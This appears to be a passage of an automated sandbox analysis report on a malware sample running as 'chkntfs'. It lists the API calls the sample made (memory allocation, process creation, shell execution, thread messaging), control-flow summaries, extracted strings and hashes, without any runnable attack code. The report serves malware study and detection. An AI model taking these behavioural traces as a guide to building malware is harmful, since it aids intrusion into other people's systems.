                                                    • Instruction ID: 472adfab9f9d37f238018908318fb0a1f6bb8891e8992644768de455e4f431b3
                                                    • Opcode Fuzzy Hash: 876c969385bc9f51c435170f5342c2e4af17e3f7354496c9c903b4b320ae3986
                                                    • Instruction Fuzzy Hash: 9C812C71D10269DBDB32CB54CC55BEEB7B8AB08754F0041EAEA09B7280D7705E84CFA4

                                                    Execution Graph

                                                    Execution Coverage:2.7%
                                                    Dynamic/Decrypted Code Coverage:4%
                                                    Signature Coverage:1.5%
                                                    Total number of Nodes:473
                                                    Total number of Limit Nodes:73
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,00000000), ref: 005ABF64
                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 005ABF9F
                                                    • FindClose.KERNEL32(?), ref: 005ABFAA
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    APIs
                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 005B7DE0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    APIs
                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 005B7F28
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(005A1A1E,?,005B6D97,00000000,00000004,00003000,?,?,?,?,?,005B6D97,005A1A1E,?,005B6D97,00000000), ref: 005B81DD
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    APIs
                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005B7FF7
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0

                                                    Control-flow Graph

                                                    control_flow_graph 517 5a0aaa-5a0b1a call 5b9f50 call 5ba960 call 5a44a0 call 591410 call 5b1280 529 5a0b3a-5a0b40 517->529 530 5a0b1c-5a0b2b PostThreadMessageW 517->530 530->529 531 5a0b2d-5a0b37 530->531 531->529
                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 005A0B27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598

                                                    Control-flow Graph

                                                    control_flow_graph 532 5a0ab0-5a0b1a call 5b9f50 call 5ba960 call 5a44a0 call 591410 call 5b1280 543 5a0b3a-5a0b40 532->543 544 5a0b1c-5a0b2b PostThreadMessageW 532->544 544->543 545 5a0b2d-5a0b37 544->545 545->543
                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 005A0B27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598

                                                    Control-flow Graph

                                                    control_flow_graph 611 5b82d0-5b8311 call 5914a0 call 5b9070 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(005A16C9,?,3L[,005A16C9,005B4677,005B4C33,?,005A16C9,005B4677,00001000,?,?,005B9BA0), ref: 005B830C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: 3L[$wF[
                                                    • API String ID: 1279760036-399143487
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    APIs
                                                    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,0000000A), ref: 0059EDFC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteShell
                                                    • String ID: """
                                                    • API String ID: 587946157-3059371096
                                                    APIs
                                                    • CreateProcessInternalW.KERNEL32(?,?,?,00000000,S}Z,00000010,?,?,?,00000044,?,00000010,005A7D53,00000000,?,?), ref: 005B8413
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID: S}Z
                                                    • API String ID: 2186235152-2157246122
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 005B835C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: Q2Z
                                                    • API String ID: 3298025750-4109463822
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00008003,?,?,005A19C0,005B6D97,005B4677,?), ref: 005A7BD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID: wF[
                                                    • API String ID: 2340568224-4100310840
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00008003,?,?,005A19C0,005B6D97,005B4677,?), ref: 005A7BD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID: wF[
                                                    • API String ID: 2340568224-4100310840
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 005AEC17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID: @J7<
                                                    • API String ID: 2538663250-2016760708
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 005AEC17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID: @J7<
                                                    • API String ID: 2538663250-2016760708
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005A4512
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00599775
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00599775
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,000004D8,00000000), ref: 005A7DBC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3705710135.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_45f0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                    • API String ID: 0-3754132690
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3705710135.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_45f0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !#-h$$$)g$'$,'?;$,-&<$0~|s$ryyf$sh:>$xah$$}fxh$~f{s$~|sh
                                                    • API String ID: 0-48033457
                                                    Strings
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048446FC
                                                    • Execute=1, xrefs: 04844713
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04844787
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04844655
                                                    • ExecuteOptions, xrefs: 048446A0
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04844725
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04844742
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048402E7
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048402BD
                                                    • RTL: Re-Waiting, xrefs: 0484031E
                                                    Memory Dump Source
